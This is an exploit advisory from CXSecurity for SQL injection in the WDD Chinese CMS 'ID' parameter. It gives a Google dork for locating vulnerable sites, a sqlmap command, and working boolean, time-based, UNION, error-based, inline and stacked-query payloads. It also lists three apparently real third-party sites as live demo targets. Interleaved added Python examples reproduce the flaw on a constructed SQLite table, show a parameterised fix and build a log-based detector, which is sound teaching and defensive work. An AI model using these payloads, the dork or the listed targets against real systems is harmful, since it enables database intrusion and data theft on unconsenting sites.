WDD CHINESE CMS SQL injection - CXSecurity.com

Vulnerability ID 1652469   Vulnerability type
Published 2019-07-03   Updated 2019-07-03
CVE ID N/A   CNNVD ID N/A
Platform N/A   CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2019070018
|Details
Vulnerability details have not yet been disclosed
|Exploit
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: WDD CHINESE CMS SQL injection
# Date: 2019-07-03
# Google Dork : intext:"DESIGNED BY WDD" inurl:ID=
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.wddgroup.com
# Version: All versions
# Tested on: Windows, Linux
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
                                             [SQL injection]     

[+] Method: SQL injection (Storm Security Team of Iran)
[+] Parameter: ID (GET), reached through URLs of the form ...php?ID=
=================================================================================

[+] Sqlmap:

[-] sqlmap -u "http://victim.com/product.php?KindID=1&ID=" -p ID --dbs

    (-p ID restricts testing to the ID parameter; --dbs enumerates the database names once an injection is confirmed.)

[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - error-based
[+] - UNION query
[+] - inline query
[+] - stacked queries

Note: the payloads below mix two dialects. SLEEP() and the FLOOR(RAND(0)*2) GROUP BY error trick are MySQL; CHAR()+CHAR() string building and WAITFOR DELAY are Microsoft SQL Server. The MySQL payloads carry ID=6 (the news.php demo) and the MSSQL stacked-query payload ID=138 (the .aspx demo), so the results were gathered from both back ends, and a given installation will only respond to the payloads written for its own database engine.
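The boolean-based blind and UNION checks from the list above, reproduced against a constructed SQLite table. This is an added example, not code from the advisory or from the WDD CMS: the CMS source is not on the page, and the query shape (an unquoted numeric ID concatenated into the WHERE clause) is an assumption inferred from the fact that `ID=6 AND 9460=9460` works without a closing quote. Table, column and row names are invented; `hardened_lookup` shows the fix (type check plus bound parameter). Time-based and stacked payloads are not reproduced because SQLite has no SLEEP()/WAITFOR and Python's sqlite3 driver refuses to run stacked statements.

```python
"""Added example: why `ID=6 AND 9460=9460` works, and how the fix kills it.

The query shape is an assumption inferred from the advisory's payloads;
SQLite stands in for the site's MySQL / MSSQL back end.
"""
import sqlite3

# Constructed sample rows standing in for the CMS news table (assumption).
SAMPLE_ROWS = [(1, 6, "Press release"), (1, 7, "Product launch"), (2, 8, "Internal memo")]


def make_db():
    """Fresh in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (KindID INTEGER, ID INTEGER, Title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, kind_id, id_param):
    """Vulnerable shape: raw request values pasted into the SQL text.
    There are no quotes around ID, so `6 AND 9460=9460` becomes part of the WHERE clause."""
    sql = f"SELECT Title FROM news WHERE KindID={kind_id} AND ID={id_param}"
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, kind_id, id_param):
    """Hardened shape: validate the type, then bind with a placeholder.
    int() rejects every payload on the page; the driver never sees user-supplied SQL."""
    try:
        kind_value, id_value = int(kind_id), int(id_param)
    except (TypeError, ValueError):
        return []  # a real handler would answer HTTP 400 here
    sql = "SELECT Title FROM news WHERE KindID=? AND ID=?"
    return [row[0] for row in conn.execute(sql, (kind_value, id_value))]


def boolean_blind_probe(lookup, conn, kind_id, base_id):
    """sqlmap's boolean-based blind test in miniature: a true tautology must keep
    the original row and a false one must drop it. Returns True if injectable."""
    true_case = lookup(conn, kind_id, f"{base_id} AND 9460=9460")
    false_case = lookup(conn, kind_id, f"{base_id} AND 9460=9461")
    return bool(true_case) and not false_case


def union_probe(lookup, conn, kind_id):
    """UNION read of the DB version, like the advisory's `-9428 UNION ALL SELECT ...`.
    The negative ID empties the original result set; one column here, 17 on the target."""
    return lookup(conn, kind_id, "-9428 UNION ALL SELECT sqlite_version()")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, boolean probe:", boolean_blind_probe(vulnerable_lookup, db, 1, 6))
    print("vulnerable, union probe:  ", union_probe(vulnerable_lookup, db, 1))
    print("hardened, boolean probe:  ", boolean_blind_probe(hardened_lookup, db, 1, 6))
    print("hardened, union probe:    ", union_probe(hardened_lookup, db, 1))
    print("hardened, normal request: ", hardened_lookup(db, 1, 6))
```

The two-request tautology in `boolean_blind_probe` is exactly what sqlmap reports as "AND boolean-based blind - WHERE or HAVING clause"; the hardened path answers both requests identically (nothing), which is the signal a defender wants to see.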

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|||||||||||||||||||||||
Parameter: ID (GET)  ||
|||||||||||||||||||||||
	Type: boolean-based blind
	Title: AND boolean-based blind - WHERE or HAVING clause
	Payload: KindID=1&ID=6 AND 9460=9460
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: AND/OR time-based blind
	Title: MySQL >= 5.0.12 AND time-based blind
	Payload: KindID=1&ID=6 AND SLEEP(5)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

     
	Type: UNION query
	Title: Generic UNION query (NULL) - 17 columns
	Payload: KindID=1&ID=-9428 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(120)+CHAR(107)+CHAR(119)+CHAR(73)+CHAR(76)+CHAR(72)+CHAR(72)+CHAR(101)+CHAR(114)+CHAR(119)+CHAR(121)+CHAR(72)+CHAR(77)+CHAR(118)+CHAR(112)+CHAR(83)+CHAR(111)+CHAR(81)+CHAR(84)+CHAR(67)+CHAR(110)+CHAR(72)+CHAR(82)+CHAR(75)+CHAR(102)+CHAR(78)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(78)+CHAR(75)+CHAR(109)+CHAR(99)+CHAR(112)+CHAR(82)+CHAR(80)+CHAR(90)+CHAR(87)+CHAR(107)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aXFY
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: error-based
	Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
	Payload: KindID=1&ID=6 AND (SELECT 2082 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(2082=2082,1))),0x716a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: inline query
	Title: Microsoft SQL Server/Sybase inline queries
	Payload: KindID=1&ID=(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113))
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

	Type: stacked queries
	Title: Microsoft SQL Server/Sybase stacked queries (comment)
	Payload: KindID=1&ID=138;WAITFOR DELAY '0:0:5'--
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
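A detection-side counterpart to the sqlmap output above: an added example, not the advisory's or the vendor's code, that classifies requests in web-server access logs by the payload families sqlmap reported here. The log lines, client address and host paths are constructed; the payload strings are the page's own, URL-encoded the way a client sends them. `%2B` stands for `+` because a raw `+` in a query string decodes to a space, which is one reason a grep for the literal payload text can miss encoded traffic.

```python
"""Added example: flag the advisory's payload families in access logs.

Not code from the advisory or the vendor. Log format, addresses and paths are constructed.
"""
import re
from urllib.parse import unquote_plus

# One regex per payload type reported by sqlmap on this page.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("time-based blind (MySQL)", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("time-based blind (MSSQL)", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("error-based (FLOOR/RAND)", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("inline CHAR() string", re.compile(r"CHAR\s*\(\s*\d+\s*\)(\s*\+\s*CHAR\s*\(\s*\d+\s*\)){2,}", re.I)),
    ("stacked query", re.compile(r";\s*(WAITFOR|SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b", re.I)),
]

# Apache/nginx combined-style line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def classify_query(query):
    """Return (param, label) for every signature matching a decoded parameter value.
    Splitting on '&' by hand keeps a ';' inside a value (the stacked-query marker) intact."""
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # %20 -> space, %2B -> '+', '+' -> space
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((unquote_plus(name), label))
    return hits


def scan_log(lines):
    """Return (ip, path, param, label) for each request that carries an injection payload."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        for param, label in classify_query(query):
            alerts.append((m.group("ip"), path, param, label))
    return alerts


# Constructed log lines carrying the page's own payloads, URL-encoded as a client would send them.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jul/2019:10:00:01 +0000] "GET /news.php?KindID=1&ID=6 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [03/Jul/2019:10:00:02 +0000] "GET /news.php?KindID=1&ID=6%20AND%209460%3D9460 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [03/Jul/2019:10:00:03 +0000] "GET /news.php?KindID=1&ID=6%20AND%20SLEEP(5) HTTP/1.1" 200 5123',
    '203.0.113.7 - - [03/Jul/2019:10:00:09 +0000] "GET /company_news_more.aspx?KindID=1&ID=138;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 7744',
    '203.0.113.7 - - [03/Jul/2019:10:00:15 +0000] "GET /product.php?KindID=36&ID=-9428%20UNION%20ALL%20SELECT%20NULL,CHAR(113)%2BCHAR(106)%2BCHAR(120)%2BCHAR(113),NULL--%20aXFY HTTP/1.1" 200 4410',
    '203.0.113.7 - - [03/Jul/2019:10:00:16 +0000] "GET /news.php?KindID=1&ID=6%20AND%20(SELECT%202082%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717171,(SELECT%20(ELT(2082%3D2082,1))),0x716a707a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 500 612',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The first sample line (a normal `ID=6` request) produces no alert; each of the others is tagged with the family it belongs to, and the MSSQL `138;WAITFOR DELAY` request is tagged twice (time-based and stacked), which is the right outcome since it is both. Matching the decoded value rather than the raw log text is what makes the signatures hold up against percent-encoding.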
Demo:
[+] https://www.crmto.com/news.php?KindID=1&ID=6[SQL]
[+] http://www.catchertw.com.tw/company_news_more.aspx?KindID=1&ID=138[SQL]
[+] http://www.navjack.com/product.php?KindID=36&ID=127[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @Storm_Security
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#